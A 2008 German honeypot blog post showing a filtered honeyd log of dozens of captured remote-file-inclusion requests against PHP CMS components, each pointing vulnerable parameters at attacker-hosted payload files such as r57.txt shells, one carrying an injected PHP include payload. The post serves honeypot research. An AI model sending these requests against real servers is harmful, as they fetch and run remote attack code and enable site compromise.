[honeyd]RFI bots?

blog.grospolina.net

Tuesday, June 17. 2008

Posted by katsumi in honeyd, honeypot, malware at 12:12 | Comments (2) | Trackbacks (0)

[honeyd]RFI bots?

ich erstelle gerade ein paar filter-scripte zum auswerten der honeyd logs. dies hier ist ein beispiel ergebnis für ein script das schlicht nach 'GET' und '=http' und 'nicht honey_domain' und 'nicht Referer' filtert:
CODE:
"GET /test.php?page=http://www.webhostmedic.com/p.c? HTTP/1.1 "GET //errors.php?error=http://www.bbs-bad-harzburg.de/contenido//contenido/includes/sistem.txt? HTTP/1.1 "GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1 "GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1 "GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1 "GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1 "GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1 "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1 "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1 "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1 "GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1 "GET /index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1 "GET /doc/index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1 "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1 "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1 "GET /doc/index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1 "GET /index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1 "GET /doc/index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1 "GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1 GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1 "GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1 "GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1 GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1 "GET //doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1 "GET /doc/index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/albid.txt??? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://nozyk.org/rob.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/31337.txt?? HTTP/1.1 "GET /?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1 "GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://201.6.243.67/UP/xs.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1 "GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1 "GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1 "GET /doc///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1 "GET ///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1 "GET /contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1 GET /doc/contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1 "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1 GET /doc//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1 "GET /doc/about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1 "GET /about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1 "GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1 "GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1 "GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
einige sollten mal ihre scripte fixen ;)

die entsprechenden dateien auf www.joerg-krug.de wurden bereits entfernt. die anderen habe ich nicht ausprobiert.
wünsch spässkes. :)
Trackbacks
Trackback specific URI for this entry
No Trackbacks
Comments
Display comments as (Linear | Threaded)
What a lovely post that you have posted i like the studies and their related web sites so you can also click the cisco exam guides for the papers.
#1 harris on 2010-03-03 10:30 (Reply)
link removed :p
#1.1 katsumi on 2010-03-09 07:42 (Reply)
Add Comment


To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

BBCode format allowed
 
 

Pages

katsumi's page
 GROSPOLINA.ORG

Glastopf Webhoneypot
 Glastopf Projektseite
Glastopf Subversion/Trac
Glastopf @ grospolina

Links

gut verglast ist ....
GLASBLOG
zeroq's blog:
VIRUSBLOG
Jon.Oberheide's blog:
jon.oberheide.org
offensivecomputing.net:
kishfellow's blog
malware&reversing
Zairon's blog
Bharath m narayan's blog:
Bharath's security blog
botnetz.com:
BOTNETZ
tho's blog:
HoneyBlog
Perforin's virii.lu:
virii.lu
The Outside Of The Asylum:
ab in die anstalt


Powered By ...?
eXTReMe Tracker

Quicksearch

Categories



All categories

Archives

Top Referrers

wappoin.info (24)
androidisin.info (12)
javarussia.info (12)
lovez24.info (12)
meetingua.info (12)
wapzings.info (12)
loves2012.info (11)
mailrupochta.info (11)
bibarok.radio104.ru (9)
makat.viahosting.ru (9)
2012androids.info (8)
24openru.info (8)
androidalgood.info (8)
androiderer.info (8)
androids24.info (8)
androidskachat.info (8)
blogloves.info (8)
durovru.info (8)
etojava.info (8)
htcain.info (8)
htcau.info (8)
htclim.info (8)
htclus.info (8)
htcma.info (8)

Letzte Goggele Suche

4521569111
dlsldododl
d0rk new 2011
ipays exploit
ipays - exploit
pbot dragonfly irc.byroe
Powered by Ollance Member Login Script
"prefix"=>"bodao","maxrand"=>"8",
intitle:© 2011 Powered by Subrion CMS
sandbox 2304 fehler
powered by zoopeer
powered by zoopeer
remote-exploit sathyajith
irc.kamtiez.web.id pbot shot|
irc.cyberirc.org bot
in my world theres no left right grospolina
213.251.169.156 pbot
"Powered By Zoopeer"
"Powered By Zoopeer"
mail.indoserver.web.id
grospolina
"powered by zoopeer"
yourwebinterface.com
Threaded Mode | Linear Mode powered by zoopeer
"@+#+irc.ascnet.biz"
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
dumme musikindustrie
verfassung und verfassungsvertrag guttenberg
"Powered By Zoopeer"
exploit irc rfi bot

Syndicate This Blog

Exploit-db, feed me!

[papers] - [Turkish] DoS/DDoS Attacks Agains DNS

Saturday, February 4. 2012
[dos] - PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow

Friday, February 3. 2012
[dos] - torrent-stats httpd.c Denial of Service

Friday, February 3. 2012
[webapps] - Achievo v1.4.3 - Multiple Web Vulnerabilities

Thursday, February 2. 2012
[webapps] - OSCommerce v3.0.2 - Persistent Cross Site Vulnerability

Thursday, February 2. 2012

Glasfeed

No RSS/OPML feed selected